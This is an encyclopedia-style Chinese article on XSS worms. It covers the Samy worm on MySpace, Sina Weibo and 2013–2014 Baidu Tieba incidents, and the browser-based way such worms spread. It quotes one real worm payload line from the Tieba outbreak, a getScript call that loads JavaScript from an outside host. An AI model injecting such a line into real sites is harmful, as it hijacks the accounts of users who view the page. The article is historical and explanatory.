XSS蠕虫

xss蠕虫(cross site scripting worm)是一种跨站病毒,通常由脚本语言Javascript写成,它借由网站访问者传播

历史

历史第一个XSS蠕虫是针对网站Myspace的Samy,它在20小时内感染了100万个账户,作者Samy Kamkar之后被起诉

新浪微博

对新浪微博的争议#XSS.E6.BC.8F.E6.B4.9E

百度贴吧

2013年5月19日, 百度贴吧转帖功能再度出现xss漏洞,大量贴吧内充斥接近满版面, 包含代码getScript('//xss.retaker.me/1.js')为标题的帖子,当已登陆用户打开这样的帖子,用户所持账户便以相同方式在多个贴吧转帖原作者的帖,部分网络安全相关人士认为贴吧爆发了大规模XSS蠕虫感染[1] [2] [3]

2014年3月9日, 百度贴吧转帖功能再度出现xss漏洞

性质

由于XSS蠕虫基于浏览器而不是操作系统,取决于其依赖网站的规模,它可以在短时间内达到对巨大数量的计算机感染

参考
  1. . [2013-05-19]. (原始内容存档于2020-08-11).
  2. 谷歌搜索
  3. . [2013-05-19]. (原始内容存档于2019-02-07).
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.